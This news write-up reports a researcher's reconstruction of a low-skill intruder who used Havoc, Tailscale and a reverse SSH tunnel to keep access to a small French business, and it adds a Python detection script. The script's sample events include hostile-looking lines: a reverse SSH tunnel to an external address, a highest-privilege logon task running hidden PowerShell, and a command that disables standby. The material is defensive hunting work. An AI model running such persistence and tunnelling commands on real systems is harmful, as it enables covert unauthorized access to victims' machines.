
Hackers Exploit Tailscale for Persistent Access After C2 Takedown


339 commands over 33 days — that is the forensic breadcrumb trail Cato Networks captured after a French-speaking intruder left SSH keys and a step‑by‑step playbook in an open storage bucket, according to a write‑up by Cato CTRL researcher Vitaly Simonovich.

The intrusion timeline: 339 commands, 33 days

Cato Networks reconstructed a full operator session spanning 33 days and 339 commands. The actor, who uses the handle "Poisson," compromised a small French automotive business and controlled four machines. The attack ran largely in memory: a VBScript stager with a sandbox‑evasion delay decrypted a PowerShell loader, which fetched a .NET loader that ran Havoc's Demon agent without dropping the implant to disk. The operator worked on a schedule that looks like a student’s — active after 3 p.m. CET with a long midday gap — and relied on free‑tier services including DuckDNS, Backblaze B2, and an IONOS VPS in Berlin.

Tailscale and OpenSSH: a separate network door

On April 7, in a five‑hour overnight session, Poisson installed OpenSSH Server and Tailscale on a victim machine, joined it to his private Tailscale network, configured key‑based SSH, and created a reverse SSH tunnel. The next day, the Havoc command‑and‑control infrastructure went offline; Cato does not say why. That barely mattered: the Tailscale path sat on a separate mesh, encrypted and independent of the Havoc C2, and it preserved access. When the Havoc server returned on April 26, the agents reconnected automatically and the operator resumed activity through the end of April and into May.

Poisson’s tradecraft: tools, failures, and narrow objectives

The operator is not portrayed as an advanced persistent threat but as a junior operator with thin tradecraft. He leaked his home directory five times, named storage buckets after his handle, and left a test file of repeated keystrokes inside the keylogger package. He failed at roughly half of his attempts, yet still compromised four machines.

Poisson used a mixed toolset: scheduled tasks set to run at every logon with highest privileges, shellcode injected into Explorer.exe, and a custom RustDesk build as a backup channel. Elevation attempts used Start‑Process -Verb RunAs, which raises a visible UAC prompt that the user must accept; on one victim this took up to a dozen tries across two days. The credential grabber was a 70‑line Python keylogger that saved keystrokes to a local file with no beacon or exfiltration server; Poisson logged in manually to retrieve the file and used powercfg to disable standby so harvesting could continue uninterrupted.

His aims were narrow: banking logins, email passwords and government portal credentials. There was no Mimikatz, no observed lateral movement, no ransomware, and no clear evidence that the documents he browsed were exfiltrated. Two executables inside a file named Thales.zip ran for about 32 minutes in total late in the operation; Cato leaves their function unexplained.

Cato Networks’ detection checklist

  • Alert on OpenSSH Server installations on Windows workstations — rare and suspicious in this environment.
  • Watch for tailscale.exe on machines that have no reason to run a VPN.
  • Look for ssh -R reverse tunnels connecting to external hosts.
  • Flag wscript.exe running .vbs files out of user staging folders.
  • Detect scheduled tasks set to highest privileges that launch script interpreters.
  • Monitor for powercfg standby‑timeout changes that keep machines awake.
  • Block DuckDNS, or at minimum alert on resolution of duckdns.org subdomains. It is a legitimate free dynamic‑DNS service, so confirm that no business system depends on it before blocking outright.
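The checklist above maps directly onto process‑creation telemetry (Sysmon Event ID 1 or Windows Security 4688) plus DNS logs. The following is an added example, not Cato's own detection content: the checklist items expressed as rules in Python and run over constructed sample events. The event fields, file paths, user names, the 203.0.113.5 address and the task name are assumptions, and the DuckDNS item is modelled as a DNS‑query check rather than a network block.

```python
"""Hunting rules modelled on the checklist, run over constructed
process-creation events.  Added example: field names and sample
events are assumptions, not Cato telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str     # full path of the newly created process
    cmdline: str   # its command line


# User-writable staging folders a stager is typically dropped into (assumed set).
USER_STAGING = re.compile(
    r"\\Users\\[^\\]+\\(AppData\\Local\\Temp|Downloads|AppData\\Roaming)\\", re.I)
# Script hosts as they appear inside a schtasks /TR argument (with or without .exe).
SCRIPT_HOSTS = re.compile(r"\b(powershell|pwsh|wscript|cscript|mshta|cmd)(\.exe)?\b")


def _exe(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def openssh_server_install(ev: ProcEvent) -> bool:
    # sshd.exe starting, or the capability being added via PowerShell.
    cl = ev.cmdline.lower()
    return _exe(ev.image) == "sshd.exe" or (
        "add-windowscapability" in cl and "openssh.server" in cl)


def tailscale_present(ev: ProcEvent) -> bool:
    return _exe(ev.image) in ("tailscale.exe", "tailscaled.exe")


def reverse_ssh_tunnel(ev: ProcEvent) -> bool:
    # -R (remote forward), also when bundled as e.g. -fNR or -R2222:...
    if _exe(ev.image) != "ssh.exe":
        return False
    return re.search(r"(^|\s)-[A-Za-z]*R(\s|\d|$)", ev.cmdline) is not None


def vbs_from_staging(ev: ProcEvent) -> bool:
    if _exe(ev.image) not in ("wscript.exe", "cscript.exe"):
        return False
    return (re.search(r"\.vbs\b", ev.cmdline, re.I) is not None
            and USER_STAGING.search(ev.cmdline) is not None)


def highest_priv_task_runs_interpreter(ev: ProcEvent) -> bool:
    cl = ev.cmdline.lower()
    if _exe(ev.image) != "schtasks.exe" or "/create" not in cl:
        return False
    return re.search(r"/rl\s+highest", cl) is not None and SCRIPT_HOSTS.search(cl) is not None


def powercfg_keeps_awake(ev: ProcEvent) -> bool:
    # standby timeout set to 0 = never sleep (on AC or battery).
    cl = ev.cmdline.lower()
    return _exe(ev.image) == "powercfg.exe" and re.search(
        r"standby-timeout-(ac|dc)\s+0\b", cl) is not None


def duckdns_query(qname: str) -> bool:
    q = qname.lower().rstrip(".")
    return q == "duckdns.org" or q.endswith(".duckdns.org")


RULES = {
    "openssh_server_install": openssh_server_install,
    "tailscale_present": tailscale_present,
    "reverse_ssh_tunnel": reverse_ssh_tunnel,
    "vbs_from_staging": vbs_from_staging,
    "highest_priv_task_runs_interpreter": highest_priv_task_runs_interpreter,
    "powercfg_keeps_awake": powercfg_keeps_awake,
}


def evaluate(events):
    """Return (rule_name, process_name) for every rule that fires, in event order."""
    return [(name, _exe(ev.image)) for ev in events
            for name, rule in RULES.items() if rule(ev)]


# Constructed sample events: six that should fire, two benign controls.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -Command Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"),
    ProcEvent(r"C:\Program Files\Tailscale\tailscale.exe", "tailscale up"),
    ProcEvent(r"C:\Windows\System32\OpenSSH\ssh.exe",
              "ssh -i key -N -R 2222:127.0.0.1:22 user@203.0.113.5"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Users\bob\AppData\Local\Temp\update.vbs"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn Updater /sc onlogon /rl highest /tr "powershell -w hidden -f C:\Users\bob\AppData\Roaming\u.ps1"'),
    ProcEvent(r"C:\Windows\System32\powercfg.exe", "powercfg /change standby-timeout-ac 0"),
    ProcEvent(r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh admin@fileserver"),       # benign
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"wscript.exe C:\Program Files\Vendor\setup.vbs"),  # benign
]

if __name__ == "__main__":
    for name, proc in evaluate(SAMPLE_EVENTS):
        print(f"{name:36s} {proc}")
```

The rules key on what the page says was observed (an `ssh -R` tunnel, `wscript.exe` launching `.vbs` from user-writable paths, `/RL HIGHEST` tasks that invoke a script host, a zero standby timeout), so the two benign controls, an ordinary `ssh` login and a vendor `.vbs` under Program Files, stay quiet. In a real deployment the same predicates translate directly into Sigma or EDR query syntax; the point is to hunt on the independent access layer, not only on the Havoc beacon.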

What this means for small business owners, security teams, and adversaries

Small business owners: the attack targeted what people type, namely bank, email and government‑portal credentials, so the financial exposure is direct even absent bulk document theft. The victim was a small automotive firm with four compromised machines, which shows that an operator with modest skills and free‑tier tooling can run credential harvesting against a business this size for weeks.

Security teams and technologists: takedown of a visible C2 is not remediation if the intruder has already built an independent access path. Cato’s checklist highlights specific telemetry to add to hunting playbooks — from unexpected OpenSSH installs on Windows to tailscale.exe and reverse SSH tunnels — and underscores that signed, legitimate binaries can defeat file‑based detection.

Adversaries: the episode demonstrates that inexpensive, legitimate services and free tiers can create resilient channels. Poisson’s use of Tailscale and signed binaries shows how an operator with modest skills can create persistence that outlives a conventional C2 takedown.

Vitaly Simonovich and Cato Networks’ reconstruction ends with a stark operational lesson: "pulling a C2 server offline is not remediation if the attacker has already built a separate door." The unanswered but practical question — what those two programs in Thales.zip actually did during their 32 minutes of execution — remains. In the meantime, defenders must treat a found C2 as a starting point, not the finish line, and hunt for the quiet persistence layers that keep attackers returning.
